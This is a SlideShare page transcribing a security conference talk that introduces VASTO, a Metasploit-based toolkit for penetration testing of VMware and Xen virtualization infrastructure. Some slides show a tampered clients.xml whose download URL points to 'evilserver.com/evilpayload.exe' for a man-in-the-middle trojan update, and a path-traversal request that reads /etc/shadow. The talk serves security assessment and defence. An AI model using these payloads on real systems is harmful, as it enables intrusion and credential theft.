SlideShare a Scribd company logo

The Good The Bad The Virtual

Claudio Criscione
Claudio Criscione

In this presentation, I introduce VASTO, the Virtualization ASsessment TOolkit. VASTO is a collection of Metasploit module to specifically assess virtual infrastructure.

Technology
1 of 48
The Good, The Bad, The Virtual Until now it wasn't war, it was practice
Nibble Security Claudio Criscione
criscio.net
Italy
And Now For Something Completely Different Let's talk about real world virtualization security
A complex small town Any movie starts with the hero getting into town Fake facade and messy buildings Lots of small shops connected by a dusty road
Hypervisors – The saloon The “core” component Can be shared with a brothel Hosted solutions Everyone wants to start a fight here
Management – The emporium A wise sheriff knows this is the place to defend Management consoles are a complex stuff nowadays Web-Based / Proprietary Protocols Centralized control of multiple instances
Storage – The Bank Any virtualization system needs a storage Usually a SAN or similar network-based solution Bandits will want to get there as soon as possible
Many other services Failover Replication Orchestration Accounting Provisoning ..it's a bit crowded
What is the exposure?
What should I evaluate? What is the added risk [WITAR] if I port my infrastructure to a virtual one? WITAR if I expose the interface to the internet? WITAR if I let user run their virtual machines on my system? WITAR if I administer the infrastructure through my internal network?
We need new tools Old tools just don't do the trick Most are not “virtualization aware” The corpus of knowledge is dispersed Knowledge of virtualization security issues is not well-spread We might miss critical issues
Introducing VASTO Virtualization ASsessment Toolkit By /me and Paolo Canaletti First beta released today after the talk A weaponized set of Metasploit modules www.metasploit.com Open source penetration test framework De-Facto standard Ruby-based, l33t... By the way, with a mascotte like this one people are going to be frightened... what about a dog?
Realistic approach If we are to analyze real-world networks, we have to think about real-world issues Weak passwords (or unknown users!) Lack of updates And so on... Most notably, all vendors keep saying “isolate the management network” In most cases, you can't do that!
I don't know about your network... But usually they don't look like this
They are more like this
You can't really trust network segregation Administrators will connect to the system through the internal network Maybe even from the internet They will use web interfaces or custom tools Virtualization hosts will be “yet one more server”
Is that a real problem? 1/3
Is that a real problem? 2/3
Is that a real problem? 3/3
VI client connection process
The autoupdate process • This is inside clients.xml <ConfigRoot> <clientConnection id="0000"> <authdPort>902</authdPort> <version>3</version> <patchVersion>3.0.0</patchVersion> <apiVersion>3.1.0</apiVersion> <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl> </clientConnection> </ConfigRoot>
An evil (MITM) idea <ConfigRoot> <clientConnection id="0000"> <authdPort>902</authdPort> <version>3</version> <patchVersion>10.0.0</patchVersion> <apiVersion>3.1.0</apiVersion> <downloadUrl>http://evilserver.com/evilpayload.exe</downloadUrl> </clientConnection> </ConfigRoot> PS: yes, you might also get the password if you do MITM
VILurker We change the clients.xml filename The update package will run under the user's privileges But it's likely an administrator We provide a trojan package Might be combined with other attacks (smb_relay and so on)
Bring in the lurker We also create a fake web interface to make the IP look legit We can perform the attack on MITM or as a rogue server Lay the trap and wait for the connection The attack will trigger a “certificate invalid” error
What about the other clients? VMware Converter Client Doesn't check SSL certificates - MITM VMware Server 1.x Doesn't check SSL certificates - MITM Open Xen Center Goes on HTTP (!)
It's the sheriff too After all, you have to trust someone With modern systems, you can just forget about clients, right? You have to think the other way round as well
Shooting the sheriff... ...maybe you don't really need it. In all movies, the sheriff can be bribed First of all, you have to understand the man Fingerprinting can be performed on most management systems
Bribe the whore From time to time, you don't even have to pay the sheriff Just pay the whore – hack the platform the management interface is integrating with Active Directory, LDAP Auth ...
Torture! In many wild west movies you get proper torture That is, you keep hitting the enemy until you succeed – brutal but it works VASTO implements bruteforcing against both VMware and XEN
Traversing the path 1/2 Identified last year – a path traversal in VMware products ESX, ESXi, Server Attack on the web interface Unauthenticated Hits as root
Traversing the path 2/2 A simple HTTP request GET /sdk/../../../../../etc/shadow Implemented by the GuestStealer perl tool – ported in VASTO Metasploit scanner by CG
XenSourceWeb Last year, we took a look at this nice web interface... ...and found Remote Code Execution, File Inclusions and XSS bugs. SN-2009-01 [Claudio Criscione, Alberto Trivero]
It was just a sample But people were using it on the internet * *or BES, ok!
Running out of the city
What does it all mean? Try to segregate the network, or use a VPN Monitor traffic for anomalies Can I suggest Masibty? No internet exposition
Once you're in The Renegade will want to become Sheriff Aiming at “long time control” of the city We all know what it means...
Trojanizing VMs Even with direct access to the machines, it's non-trivial Custom disk formats – VMDK, VHD Hard to access without breaking the disk layout We do have proprietary libraries we can use Bottom line: even one access to the VM library means losing the infrastructure!
Shoot the pianist Yet another meme: shoot the “supporting infrastructure” Attacking is often easy Risk is not well- understood Low protection Lots of supporting services Converters Backup managers Profilers…
VMware Studio A virtual appliance used to build appliances Used by developers to manage appliances... ...which are likely deployed on the infrastructure
File Upload Yet another path traversal in the web interface As root Without any authentication Breaking the Studio appliance might mean getting all the built appliances SN-2009-03
Bottom Line Take care of the infrastructure as well! Don't really trust third party products unless tested... Try to implement proper segregation
Conclusions When a man with a .45 meets a man with a rifle, the man with a pistol will be a dead man. We're developing new tools to improve our arsenal Virtualization security is not (yet) well understood If you don't test and prove it, it doesn't exist!
Future of VASTO … more modules to come … will try to be the reference in virtualization pentest … beta testers needed
Questions
Thank you! Grab the beta at nibblesec.org Claudio Criscione c.criscione@securenetwork.it

Recommended

[Confidence0902] The Glass Cage - Virtualization Security
[Confidence0902] The Glass Cage - Virtualization Security[Confidence0902] The Glass Cage - Virtualization Security
[Confidence0902] The Glass Cage - Virtualization SecurityClaudio Criscione
 
BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector
BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector
BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector BlueHat Security Conference
 
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...enigma0x3
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...
Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...
Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...DefconRussia
 
Sicurezza della virtualizzazione - SMAU 2009
Sicurezza della virtualizzazione - SMAU 2009Sicurezza della virtualizzazione - SMAU 2009
Sicurezza della virtualizzazione - SMAU 2009Claudio Criscione
 
Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Claudio Criscione
 
Introduzione alla computer forensic - acquisizione
Introduzione alla computer forensic - acquisizioneIntroduzione alla computer forensic - acquisizione
Introduzione alla computer forensic - acquisizioneClaudio Criscione
 

Recommended

[Confidence0902] The Glass Cage - Virtualization Security
[Confidence0902] The Glass Cage - Virtualization Security[Confidence0902] The Glass Cage - Virtualization Security
[Confidence0902] The Glass Cage - Virtualization SecurityClaudio Criscione
 
BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector
BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector
BlueHat v17 || Don't Let Your Virtualization Fabric Become the Attack Vector BlueHat Security Conference
 
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...enigma0x3
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...
Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...
Rafal Wojtczuk - Endpoint security via Application sandboxing and virtualizat...DefconRussia
 
Sicurezza della virtualizzazione - SMAU 2009
Sicurezza della virtualizzazione - SMAU 2009Sicurezza della virtualizzazione - SMAU 2009
Sicurezza della virtualizzazione - SMAU 2009Claudio Criscione
 
Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Virtually Pwned: Hacking VMware [ITA - SMAU10]
Virtually Pwned: Hacking VMware [ITA - SMAU10]Claudio Criscione
 
Introduzione alla computer forensic - acquisizione
Introduzione alla computer forensic - acquisizioneIntroduzione alla computer forensic - acquisizione
Introduzione alla computer forensic - acquisizioneClaudio Criscione
 
Virtually Pwned
Virtually PwnedVirtually Pwned
Virtually PwnedClaudio Criscione
 
Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and Exploitation Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and ExploitationMattia Salvi
 
VirtSec, and the Open Source impact
VirtSec, and the Open Source impactVirtSec, and the Open Source impact
VirtSec, and the Open Source impactKris Buytaert
 
Virtualization securityv2
Virtualization securityv2Virtualization securityv2
Virtualization securityv2vivekbhat
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGRunweb.me
 
Understand study
Understand studyUnderstand study
Understand studyAntonio Costa aka Cooler_
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2vivekbhat
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threatsKishore Kumar
 
Virtualization presentation
Virtualization presentationVirtualization presentation
Virtualization presentationMangesh Gunjal
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...Felipe Prado
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfDefconRussia
 
Virtualization Security
Virtualization SecurityVirtualization Security
Virtualization Securitysyrinxtech
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for EveryoneNikhil Mittal
 
Why the cloud is more secure than your existing systems
Why the cloud is more secure than your existing systemsWhy the cloud is more secure than your existing systems
Why the cloud is more secure than your existing systemsErnest Mueller
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Linuxmalaysia Malaysia
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 
Broken by design (Danny Fullerton)
Broken by design (Danny Fullerton)Broken by design (Danny Fullerton)
Broken by design (Danny Fullerton)Hackfest Communication
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 

More Related Content

Similar to The Good The Bad The Virtual

Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and Exploitation Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and ExploitationMattia Salvi
 
VirtSec, and the Open Source impact
VirtSec, and the Open Source impactVirtSec, and the Open Source impact
VirtSec, and the Open Source impactKris Buytaert
 
Virtualization securityv2
Virtualization securityv2Virtualization securityv2
Virtualization securityv2vivekbhat
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGRunweb.me
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkSecurityTube.Net
 
CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2vivekbhat
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threatsKishore Kumar
 
Virtualization presentation
Virtualization presentationVirtualization presentation
Virtualization presentationMangesh Gunjal
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...Felipe Prado
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfDefconRussia
 
Virtualization Security
Virtualization SecurityVirtualization Security
Virtualization Securitysyrinxtech
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for EveryoneNikhil Mittal
 
Why the cloud is more secure than your existing systems
Why the cloud is more secure than your existing systemsWhy the cloud is more secure than your existing systems
Why the cloud is more secure than your existing systemsErnest Mueller
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detectionamiable_indian
 

Similar to The Good The Bad The Virtual (20)

Virtually Pwned
Virtually PwnedVirtually Pwned
Virtually Pwned
 
Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and Exploitation Virtual Machines Security Internals: Detection and Exploitation
Virtual Machines Security Internals: Detection and Exploitation
 
VirtSec, and the Open Source impact
VirtSec, and the Open Source impactVirtSec, and the Open Source impact
VirtSec, and the Open Source impact
 
Virtualization securityv2
Virtualization securityv2Virtualization securityv2
Virtualization securityv2
 
Mist.io @ AWSUGGR
Mist.io @ AWSUGGRMist.io @ AWSUGGR
Mist.io @ AWSUGGR
 
Understand study
Understand studyUnderstand study
Understand study
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2CSA Presentation 26th May Virtualization securityv2
CSA Presentation 26th May Virtualization securityv2
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
Recognizing security threats
Recognizing security threatsRecognizing security threats
Recognizing security threats
 
Virtualization presentation
Virtualization presentationVirtualization presentation
Virtualization presentation
 
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane...
 
Keynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourselfKeynote fx try harder 2 be yourself
Keynote fx try harder 2 be yourself
 
Virtualization Security
Virtualization SecurityVirtualization Security
Virtualization Security
 
Teensy Programming for Everyone
Teensy Programming for EveryoneTeensy Programming for Everyone
Teensy Programming for Everyone
 
Why the cloud is more secure than your existing systems
Why the cloud is more secure than your existing systemsWhy the cloud is more secure than your existing systems
Why the cloud is more secure than your existing systems
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 
Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004Sembang2 Keselamatan It 2004
Sembang2 Keselamatan It 2004
 
Rootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise DetectionRootkit Hunting & Compromise Detection
Rootkit Hunting & Compromise Detection
 
Broken by design (Danny Fullerton)
Broken by design (Danny Fullerton)Broken by design (Danny Fullerton)
Broken by design (Danny Fullerton)
 

Recently uploaded

A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesThousandEyes
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality AssuranceInflectra
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Hiroshi SHIBATA
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesKari Kakkonen
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxLoriGlavin3
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsPixlogix Infotech
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfNeo4j
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Strongerpanagenda
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationKnoldus Inc.
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Farhan Tariq
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxLoriGlavin3
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch TuesdayIvanti
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 

Recently uploaded (20)

A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyesAssure Ecommerce and Retail Operations Uptime with ThousandEyes
Assure Ecommerce and Retail Operations Uptime with ThousandEyes
 
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance[Webinar] SpiraTest - Setting New Standards in Quality Assurance
[Webinar] SpiraTest - Setting New Standards in Quality Assurance
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdf
 
Testing tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptxThe Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
The Role of FIDO in a Cyber Secure Netherlands: FIDO Paris Seminar.pptx
 
The Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and ConsThe Ultimate Guide to Choosing WordPress Pros and Cons
The Ultimate Guide to Choosing WordPress Pros and Cons
 
Connecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdfConnecting the Dots for Information Discovery.pdf
Connecting the Dots for Information Discovery.pdf
 
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better StrongerModern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
Modern Roaming for Notes and Nomad – Cheaper Faster Better Stronger
 
Data governance with Unity Catalog Presentation
Data governance with Unity Catalog PresentationData governance with Unity Catalog Presentation
Data governance with Unity Catalog Presentation
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...
 

The Good The Bad The Virtual

  • 1. The Good, The Bad, The Virtual Until now it wasn't war, it was practice
  • 5.
  • 6. And Now For Something Completely Different Let's talk about real world virtualization security
  • 7. A complex small town Any movie starts with the hero getting into town Fake facade and messy buildings Lots of small shops connected by a dusty road
  • 8. Hypervisors – The saloon The “core” component Can be shared with a brothel Hosted solutions Everyone wants to start a fight here
  • 9. Management – The emporium A wise sheriff knows this is the place to defend Management consoles are a complex stuff nowadays Web-Based / Proprietary Protocols Centralized control of multiple instances
  • 10. Storage – The Bank Any virtualization system needs a storage Usually a SAN or similar network-based solution Bandits will want to get there as soon as possible
  • 12. What is the exposure?
  • 13. What should I evaluate? What is the added risk [WITAR] if I port my infrastructure to a virtual one? WITAR if I expose the interface to the internet? WITAR if I let user run their virtual machines on my system? WITAR if I administer the infrastructure through my internal network?
  • 14. We need new tools Old tools just don't do the trick Most are not “virtualization aware” The corpus of knowledge is dispersed Knowledge of virtualization security issues is not well-spread We might miss critical issues
  • 15. Introducing VASTO Virtualization ASsessment Toolkit By /me and Paolo Canaletti First beta released today after the talk A weaponized set of Metasploit modules www.metasploit.com Open source penetration test framework De-Facto standard Ruby-based, l33t... By the way, with a mascotte like this one people are going to be frightened... what about a dog?
  • 16. Realistic approach If we are to analyze real-world networks, we have to think about real-world issues Weak passwords (or unknown users!) Lack of updates And so on... Most notably, all vendors keep saying “isolate the management network” In most cases, you can't do that!
  • 17. I don't know about your network... But usually they don't look like this
  • 18. They are more like this
  • 19. You can't really trust network segregation Administrators will connect to the system through the internal network Maybe even from the internet They will use web interfaces or custom tools Virtualization hosts will be “yet one more server”
  • 20. Is that a real problem? 1/3
  • 21. Is that a real problem? 2/3
  • 22. Is that a real problem? 3/3
  • 24. The autoupdate process • This is inside clients.xml <ConfigRoot> <clientConnection id="0000"> <authdPort>902</authdPort> <version>3</version> <patchVersion>3.0.0</patchVersion> <apiVersion>3.1.0</apiVersion> <downloadUrl>https://*/client/VMware-viclient.exe</downloadUrl> </clientConnection> </ConfigRoot>
  • 25. An evil (MITM) idea <ConfigRoot> <clientConnection id="0000"> <authdPort>902</authdPort> <version>3</version> <patchVersion>10.0.0</patchVersion> <apiVersion>3.1.0</apiVersion> <downloadUrl>http://evilserver.com/evilpayload.exe</downloadUrl> </clientConnection> </ConfigRoot> PS: yes, you might also get the password if you do MITM
  • 26. VILurker We change the clients.xml filename The update package will run under the user's privileges But it's likely an administrator We provide a trojan package Might be combined with other attacks (smb_relay and so on)
  • 27. Bring in the lurker We also create a fake web interface to make the IP look legit We can perform the attack on MITM or as a rogue server Lay the trap and wait for the connection The attack will trigger a “certificate invalid” error
  • 28. What about the other clients? VMware Converter Client Doesn't check SSL certificates - MITM VMware Server 1.x Doesn't check SSL certificates - MITM Open Xen Center Goes on HTTP (!)
  • 29. It's the sheriff too After all, you have to trust someone With modern systems, you can just forget about clients, right? You have to think the other way round as well
  • 30. Shooting the sheriff... ...maybe you don't really need it. In all movies, the sheriff can be bribed First of all, you have to understand the man Fingerprinting can be performed on most management systems
  • 31. Bribe the whore From time to time, you don't even have to pay the sheriff Just pay the whore – hack the platform the management interface is integrating with Active Directory, LDAP Auth ...
  • 32. Torture! In many wild west movies you get proper torture That is, you keep hitting the enemy until you succeed – brutal but it works VASTO implements bruteforcing against both VMware and XEN
  • 33. Traversing the path 1/2 Identified last year – a path traversal in VMware products ESX, ESXi, Server Attack on the web interface Unauthenticated Hits as root
  • 34. Traversing the path 2/2 A simple HTTP request GET /sdk/../../../../../etc/shadow Implemented by the GuestStealer perl tool – ported in VASTO Metasploit scanner by CG
  • 35. XenSourceWeb Last year, we took a look at this nice web interface... ...and found Remote Code Execution, File Inclusions and XSS bugs. SN-2009-01 [Claudio Criscione, Alberto Trivero]
  • 36. It was just a sample But people were using it on the internet * *or BES, ok!
  • 37. Running out of the city
